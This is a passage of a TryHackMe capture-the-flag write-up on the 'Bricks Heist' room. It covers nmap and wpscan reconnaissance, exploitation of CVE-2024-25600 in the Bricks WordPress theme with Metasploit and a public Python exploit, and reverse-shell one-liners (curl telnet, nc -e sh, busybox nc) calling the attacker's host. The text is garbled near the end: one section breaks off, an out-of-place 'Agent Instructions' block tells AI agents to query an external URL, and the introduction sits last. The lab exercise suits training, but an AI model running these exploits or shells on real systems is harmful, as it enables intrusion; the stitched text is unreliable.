Message:\x20Method\x20Not\x20
SF:Allowed\.
\n\x20\x20\x20\x20\x20\x20\x20\x20Error\x20code\x20expl
SF:anation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20
SF:this\x20resource\.
\n\x20\x20\x20\x20\n\n")%r(HTTPOpti
SF:ons,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\n
SF:Server:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\
SF:x202024\x2010:54:18\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20
SF:text/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n\n\n
SF:\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20Error\x20response\n\x20\x20\x20\
SF:x20\n\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20Error\x20response
\n\x20\x20\x20\x20\x20\x20\x20\x20Error\x20co
SF:de:\x20501
\n\x20\x20\x20\x20\x20\x20\x20\x20Message:\x20Unsuppor
SF:ted\x20method\x20\('OPTIONS'\)\.
\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:p>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20
SF:Server\x20does\x20not\x20support\x20this\x20operation\.\n\x20\x20\x
SF:20\x20\n\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.33 seconds
```
We can see that Apache is running on port 443, and that Wordpress is installed on that server.
### 1c - Vulners
```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners -p22,80,443,3306 bricks.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-03 13:57 EEST
Nmap scan report for bricks.thm (10.10.212.66)
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2012-1577 7.5 https://vulners.com/cve/CVE-2012-1577
| PRION:CVE-2020-15778 6.8 https://vulners.com/prion/PRION:CVE-2020-15778
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| PRION:CVE-2020-12062 5.0 https://vulners.com/prion/PRION:CVE-2020-12062
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2010-4816 5.0 https://vulners.com/cve/CVE-2010-4816
| PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| PRION:CVE-2021-41617 4.4 https://vulners.com/prion/PRION:CVE-2021-41617
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145
| PRION:CVE-2016-20012 4.3 https://vulners.com/prion/PRION:CVE-2016-20012
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
| CVE-2023-51767 3.5 https://vulners.com/cve/CVE-2023-51767
| PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http WebSockify Python/3.8.10
|_http-server-header: WebSockify Python/3.8.10
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 405 Method Not Allowed
| Server: WebSockify Python/3.8.10
| Date: Fri, 03 May 2024 10:57:13 GMT
| Connection: close
| Content-Type: text/html;charset=utf-8
| Content-Length: 472
|
|
|
|
| Error response
|
|
| Error response
| Error code: 405
| Message: Method Not Allowed.
| Error code explanation: 405 - Specified method is invalid for this resource.
|
|
| HTTPOptions:
| HTTP/1.1 501 Unsupported method ('OPTIONS')
| Server: WebSockify Python/3.8.10
| Date: Fri, 03 May 2024 10:57:14 GMT
| Connection: close
| Content-Type: text/html;charset=utf-8
| Content-Length: 500
|
|
|
|
| Error response
|
|
| Error response
| Error code: 501
| Message: Unsupported method ('OPTIONS').
| Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.
|
|_
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
3306/tcp open mysql MySQL (unauthorized)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=5/3%Time=6634C30C%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x
SF:20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\x202024\x
SF:2010:57:13\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html
SF:;charset=utf-8\r\nContent-Length:\x20472\r\n\r\n\n\n\x20\x20\
SF:x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20Error\x20response\n\x20\x20\x20\x20\n\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20Error\x2
SF:0response
\n\x20\x20\x20\x20\x20\x20\x20\x20Error\x20code:\x2040
SF:5
\n\x20\x20\x20\x20\x20\x20\x20\x20Message:\x20Method\x20Not\x20
SF:Allowed\.
\n\x20\x20\x20\x20\x20\x20\x20\x20Error\x20code\x20expl
SF:anation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20
SF:this\x20resource\.
\n\x20\x20\x20\x20\n\n")%r(HTTPOpti
SF:ons,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\n
SF:Server:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2003\x20May\
SF:x202024\x2010:57:14\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20
SF:text/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n\n\n
SF:\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20
SF:\x20\x20\x20\x20\x20\x20Error\x20response\n\x20\x20\x20\
SF:x20\n\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20Error\x20response
\n\x20\x20\x20\x20\x20\x20\x20\x20Error\x20co
SF:de:\x20501
\n\x20\x20\x20\x20\x20\x20\x20\x20Message:\x20Unsuppor
SF:ted\x20method\x20\('OPTIONS'\)\.
\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:p>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20
SF:Server\x20does\x20not\x20support\x20this\x20operation\.\n\x20\x20\x
SF:20\x20\n\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.77 seconds
```
Nothing interesting in the above output
## 2 - Wordpress (443)
```
┌──(kali㉿kali)-[~]
└─$ wpscan --url https://bricks.thm --disable-tls-checks --api-token REDACTED_BY_ME
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: https://bricks.thm/ [10.10.212.66]
[+] Started: Fri May 3 14:12:10 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: server: Apache
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: https://bricks.thm/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://bricks.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: https://bricks.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://bricks.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.5 identified (Insecure, released on 2024-04-02).
| Found By: Rss Generator (Passive Detection)
| - https://bricks.thm/feed/, https://wordpress.org/?v=6.5
| - https://bricks.thm/comments/feed/, https://wordpress.org/?v=6.5
|
| [!] 1 vulnerability identified:
|
| [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
| Fixed in: 6.5.2
| References:
| - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
| - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
[+] WordPress theme in use: bricks
| Location: https://bricks.thm/wp-content/themes/bricks/
| Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
| Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
| Style Name: Bricks
| Style URI: https://bricksbuilder.io/
| Description: Visual website builder for WordPress....
| Author: Bricks
| Author URI: https://bricksbuilder.io/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Bricks < 1.9.6.1 - Unauthenticated Remote Code Execution
| Fixed in: 1.9.6.1
| References:
| - https://wpscan.com/vulnerability/8bab5266-7154-4b65-b5bc-07a91b28be42
| - https://twitter.com/calvinalkan/status/1757441538164994099
| - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
|
| [!] Title: Bricks < 1.9.6.1 - Unauthenticated Remote Code Execution
| Fixed in: 1.9.6.1
| References:
| - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/b97b1c86-22a4-462b-9140-55139cf02c7a
|
| Version: 1.9.5 (80% confidence)
| Found By: Style (Passive Detection)
| - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:05 <====================> (137 / 137) 100.00% Time: 00:00:05
[i] No Config Backups Found.
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 23
[+] Finished: Fri May 3 14:12:22 2024
[+] Requests Done: 143
[+] Cached Requests: 38
[+] Data Sent: 35.385 KB
[+] Data Received: 57.585 KB
[+] Memory used: 255.609 MB
[+] Elapsed time: 00:00:12
```
This is very interesting: a very recent unauthd RCE vulnerability has been detected on the target server.
## 3 - Foothold
### 3a - Metasploit
If we Google about the RCE vuln we found, we can see that Rapid7 already added an exploit to Metasploit:
```
msf6 > search bricks
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/wp_bricks_builder_rce 2024-02-19 excellent Yes Unauthenticated RCE in Bricks Builder Theme
1 \_ target: Automatic . . . .
2 \_ target: PHP In-Memory . . . .
3 \_ target: Unix In-Memory . . . .
4 \_ target: Windows In-Memory . . . .
Interact with a module by name or index. For example info 4, use 4 or use exploit/multi/http/wp_bricks_builder_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows In-Memory'
msf6 > use 1
[*] Additionally setting TARGET => Automatic
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_bricks_builder_rce) > show options
Module options (exploit/multi/http/wp_bricks_builder_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using
-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/wp_bricks_builder_rce) > set LHOST 10.11.85.12
LHOST => 10.11.85.12
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RHOSTS bricks.thm
RHOST => bricks.thm
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RPORT 443
RPORT => 443
msf6 exploit(multi/http/wp_bricks_builder_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. WordPress does not appear to be online. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_bricks_builder_rce) > set RHOSTS 10.10.239.202
RHOSTS => 10.10.239.202
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.5
[+] Detected Bricks Builder theme version: 1.9.5
[+] The target appears to be vulnerable.
[+] Nonce retrieved: 964a6e9b87
[*] Sending stage (39927 bytes) to 10.10.239.202
[*] Meterpreter session 1 opened (10.11.85.12:4444 -> 10.10.239.202:46644) at 2024-05-04 09:18:09 +0300
meterpreter >
```
### 3b - First flag
```
meterpreter > ls
Listing: /data/www/default
==========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 523 fil 2024-04-02 14:13:36 +0300 .htaccess
100644/rw-r--r-- 43 fil 2024-04-05 15:39:01 +0300 FLAG_REDACTED.txt
100644/rw-r--r-- 405 fil 2024-04-02 14:12:03 +0300 index.php
040755/rwxr-xr-x 4096 dir 2023-04-12 03:53:55 +0300 kod
100644/rw-r--r-- 19915 fil 2024-04-04 18:15:40 +0300 license.txt
040755/rwxr-xr-x 4096 dir 2024-04-02 14:03:35 +0300 phpmyadmin
100644/rw-r--r-- 7401 fil 2024-04-04 18:15:40 +0300 readme.html
100644/rw-r--r-- 7387 fil 2024-04-04 18:15:40 +0300 wp-activate.php
040755/rwxr-xr-x 4096 dir 2024-04-02 14:12:03 +0300 wp-admin
100644/rw-r--r-- 351 fil 2024-04-02 14:12:03 +0300 wp-blog-header.php
100644/rw-r--r-- 2323 fil 2024-04-02 14:12:03 +0300 wp-comments-post.php
100644/rw-r--r-- 3012 fil 2024-04-04 18:15:40 +0300 wp-config-sample.php
100666/rw-rw-rw- 3288 fil 2024-04-02 14:12:39 +0300 wp-config.php
040755/rwxr-xr-x 4096 dir 2024-05-04 09:19:23 +0300 wp-content
100644/rw-r--r-- 5638 fil 2024-04-02 14:12:03 +0300 wp-cron.php
040755/rwxr-xr-x 16384 dir 2024-04-04 18:15:40 +0300 wp-includes
100644/rw-r--r-- 2502 fil 2024-04-02 14:12:03 +0300 wp-links-opml.php
100644/rw-r--r-- 3927 fil 2024-04-02 14:12:03 +0300 wp-load.php
100644/rw-r--r-- 50917 fil 2024-04-04 18:15:40 +0300 wp-login.php
100644/rw-r--r-- 8525 fil 2024-04-02 14:12:03 +0300 wp-mail.php
100644/rw-r--r-- 28427 fil 2024-04-04 18:15:40 +0300 wp-settings.php
100644/rw-r--r-- 34385 fil 2024-04-02 14:12:03 +0300 wp-signup.php
100644/rw-r--r-- 4885 fil 2024-04-02 14:12:03 +0300 wp-trackback.php
100644/rw-r--r-- 3246 fil 2024-04-04 18:15:40 +0300 xmlrpc.php
```
### 3c - Going from meterpreter to stable shell
Something very annoying is happening: every time I try to spawn a shell using meterpreter, or try to execute any command on the target machine, the meterpreter session dies.
```
msf6 exploit(multi/http/wp_bricks_builder_rce) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.5
[+] Detected Bricks Builder theme version: 1.9.5
[+] The target appears to be vulnerable.
[+] Nonce retrieved: 964a6e9b87
[*] Sending stage (39927 bytes) to 10.10.239.202
[*] Meterpreter session 5 opened (10.11.85.12:4444 -> 10.10.239.202:35094) at 2024-05-04 09:50:22 +0300
meterpreter > shell
[*] 10.10.239.202 - Meterpreter session 5 closed. Reason: Died
```
That is why I chose to go with another exploit implementation:
```
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/Chocapikk/CVE-2024-25600/archive/refs/heads/main.zip
--2024-05-04 10:23:54-- https://github.com/Chocapikk/CVE-2024-25600/archive/refs/heads/main.zip
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://codeload.github.com/Chocapikk/CVE-2024-25600/zip/refs/heads/main [following]
--2024-05-04 10:23:55-- https://codeload.github.com/Chocapikk/CVE-2024-25600/zip/refs/heads/main
Resolving codeload.github.com (codeload.github.com)... 140.82.121.10
Connecting to codeload.github.com (codeload.github.com)|140.82.121.10|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/zip]
Saving to: ‘main.zip’
main.zip [ <=> ] 5.28K --.-KB/s in 0.1s
2024-05-04 10:23:59 (50.4 KB/s) - ‘main.zip’ saved [5411]
┌──(kali㉿kali)-[~]
└─$ unzip main.zip
Archive: main.zip
19e80ce8c448bccc2fcca161ebf76db569a14b19
creating: CVE-2024-25600-main/
inflating: CVE-2024-25600-main/README.md
inflating: CVE-2024-25600-main/exploit.py
extracting: CVE-2024-25600-main/requirements.txt
┌──(kali㉿kali)-[~]
└─$ cd CVE-2024-25600-main/
┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ python -m venv venv
┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ source venv/bin/activate
┌──(venv)─(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ pip install -r requirements.txt
Collecting alive_progress (from -r requirements.txt (line 1))
Downloading alive_progress-3.1.5-py3-none-any.whl.metadata (68 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 68.4/68.4 kB 136.8 kB/s eta 0:00:00
Collecting bs4 (from -r requirements.txt (line 2))
Downloading bs4-0.0.2-py2.py3-none-any.whl.metadata (411 bytes)
Collecting prompt_toolkit (from -r requirements.txt (line 3))
Downloading prompt_toolkit-3.0.43-py3-none-any.whl.metadata (6.5 kB)
Collecting requests (from -r requirements.txt (line 4))
Downloading requests-2.31.0-py3-none-any.whl.metadata (4.6 kB)
Collecting rich (from -r requirements.txt (line 5))
Downloading rich-13.7.1-py3-none-any.whl.metadata (18 kB)
Collecting about-time==4.2.1 (from alive_progress->-r requirements.txt (line 1))
Downloading about_time-4.2.1-py3-none-any.whl.metadata (13 kB)
Collecting grapheme==0.6.0 (from alive_progress->-r requirements.txt (line 1))
Downloading grapheme-0.6.0.tar.gz (207 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 207.3/207.3 kB 14.0 kB/s eta 0:00:00
Installing build dependencies ... done
Getting requirements to build wheel ... done
Installing backend dependencies ... done
Preparing metadata (pyproject.toml) ... done
Collecting beautifulsoup4 (from bs4->-r requirements.txt (line 2))
Downloading beautifulsoup4-4.12.3-py3-none-any.whl.metadata (3.8 kB)
Collecting wcwidth (from prompt_toolkit->-r requirements.txt (line 3))
Downloading wcwidth-0.2.13-py2.py3-none-any.whl.metadata (14 kB)
Collecting charset-normalizer<4,>=2 (from requests->-r requirements.txt (line 4))
Downloading charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (33 kB)
Collecting idna<4,>=2.5 (from requests->-r requirements.txt (line 4))
Downloading idna-3.7-py3-none-any.whl.metadata (9.9 kB)
Collecting urllib3<3,>=1.21.1 (from requests->-r requirements.txt (line 4))
Downloading urllib3-2.2.1-py3-none-any.whl.metadata (6.4 kB)
Collecting certifi>=2017.4.17 (from requests->-r requirements.txt (line 4))
Downloading certifi-2024.2.2-py3-none-any.whl.metadata (2.2 kB)
Collecting markdown-it-py>=2.2.0 (from rich->-r requirements.txt (line 5))
Downloading markdown_it_py-3.0.0-py3-none-any.whl.metadata (6.9 kB)
Collecting pygments<3.0.0,>=2.13.0 (from rich->-r requirements.txt (line 5))
Downloading pygments-2.17.2-py3-none-any.whl.metadata (2.6 kB)
Collecting mdurl~=0.1 (from markdown-it-py>=2.2.0->rich->-r requirements.txt (line 5))
Downloading mdurl-0.1.2-py3-none-any.whl.metadata (1.6 kB)
Collecting soupsieve>1.2 (from beautifulsoup4->bs4->-r requirements.txt (line 2))
Downloading soupsieve-2.5-py3-none-any.whl.metadata (4.7 kB)
Downloading alive_progress-3.1.5-py3-none-any.whl (75 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 76.0/76.0 kB 17.6 kB/s eta 0:00:00
Downloading about_time-4.2.1-py3-none-any.whl (13 kB)
Downloading bs4-0.0.2-py2.py3-none-any.whl (1.2 kB)
Downloading prompt_toolkit-3.0.43-py3-none-any.whl (386 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 386.1/386.1 kB 23.7 kB/s eta 0:00:00
Downloading requests-2.31.0-py3-none-any.whl (62 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 62.6/62.6 kB 24.0 kB/s eta 0:00:00
Downloading rich-13.7.1-py3-none-any.whl (240 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 240.7/240.7 kB 16.7 kB/s eta 0:00:00
Downloading certifi-2024.2.2-py3-none-any.whl (163 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 163.8/163.8 kB 12.8 kB/s eta 0:00:00
Downloading charset_normalizer-3.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (140 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 140.3/140.3 kB 18.8 kB/s eta 0:00:00
Downloading idna-3.7-py3-none-any.whl (66 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 66.8/66.8 kB 18.3 kB/s eta 0:00:00
Downloading markdown_it_py-3.0.0-py3-none-any.whl (87 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 87.5/87.5 kB 23.3 kB/s eta 0:00:00
Downloading pygments-2.17.2-py3-none-any.whl (1.2 MB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.2/1.2 MB 18.2 kB/s eta 0:00:00
Downloading urllib3-2.2.1-py3-none-any.whl (121 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 121.1/121.1 kB 16.1 kB/s eta 0:00:00
Downloading beautifulsoup4-4.12.3-py3-none-any.whl (147 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 147.9/147.9 kB 18.6 kB/s eta 0:00:00
Downloading wcwidth-0.2.13-py2.py3-none-any.whl (34 kB)
Downloading mdurl-0.1.2-py3-none-any.whl (10.0 kB)
Downloading soupsieve-2.5-py3-none-any.whl (36 kB)
Building wheels for collected packages: grapheme
Building wheel for grapheme (pyproject.toml) ... done
Created wheel for grapheme: filename=grapheme-0.6.0-py3-none-any.whl size=210078 sha256=fbdc53ce28a739bd023fe2fa13724076906e82c58d137536e74b64655a175a8d
Stored in directory: /home/kali/.cache/pip/wheels/ee/3b/0b/1b865800e916d671a24028d884698674138632a83fdfad4926
Successfully built grapheme
Installing collected packages: wcwidth, grapheme, urllib3, soupsieve, pygments, prompt_toolkit, mdurl, idna, charset-normalizer, certifi, about-time, requests, markdown-it-py, beautifulsoup4, alive_progress, rich, bs4
Successfully installed about-time-4.2.1 alive_progress-3.1.5 beautifulsoup4-4.12.3 bs4-0.0.2 certifi-2024.2.2 charset-normalizer-3.3.2 grapheme-0.6.0 idna-3.7 markdown-it-py-3.0.0 mdurl-0.1.2 prompt_toolkit-3.0.43 pygments-2.17.2 requests-2.31.0 rich-13.7.1 soupsieve-2.5 urllib3-2.2.1 wcwidth-0.2.13
┌──(venv)─(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ python exploit.py -u https://bricks.thm
[*] Nonce found: 964a6e9b87
[+] https://bricks.thm is vulnerable to CVE-2024-25600. Command output: apache
[!] Shell is ready, please type your commands UwU
# whoami
apache
# C='curl -Ns telnet://10.11.85.12:9001'; $C &1 | sh 2>&1 | $C >/dev/null
[-] No valid response received or target not vulnerable.
# whoami
apache
# nc 10.11.85.12 9001 -e sh
[-] No valid response received or target not vulnerable.
# busybox nc 10.11.85.12 9001 -e sh
```
```
┌──(kali㉿kali)-[~/CVE-2024-25600-main]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.239.202] 55846
whoami
apache
python -c 'import pty;pty.spawn("/bin/bash")'
apache@tryhackme:/data/www/default$
```
## 4 - Looking around
We are supposed to find the name of a suspicious process. ps-aux does not give any useful info. However, if we list services, we find: (grepping because output is too huge without it)
```
apache@tryhackme:/data/www/default$ systemctl | grep TRYHACK
systemctl | grep TRYHACK
ubuntu.service loaded active running TRYHACK3M
```
The above outputs the name of a service, not the process that is executec by this service:
```
apache@tryhackme:/data/www/default$ systemctl status ubuntu.service
systemctl status ubuntu.service
● ubuntu.service - TRYHACK3M
Loaded: loaded (/etc/systemd/system/ubuntu.service; enabled; vendor preset: enabled)
Active: active (running) since Sat 2024-05-04 07:42:43 UTC; 3min 27s ago
Main PID: 2739 (nm-inet-dialog)
Tasks: 2 (limit: 4671)
Memory: 30.6M
CGroup: /system.slice/ubuntu.service
├─2739 /lib/NetworkManager/nm-inet-dialog
└─2740 /lib/NetworkManager/nm-inet-dialog
```
## 5 - Digging into the miner
```
apache@tryhackme:/lib/NetworkManager$ systemctl list-unit-files ubuntu.service
A Bitcoin wallet address!
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ctfs.anthonyjsaab.com/tryhackme/tryhack3m-bricks-heist.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)
## 0 - Introduction
Link to room: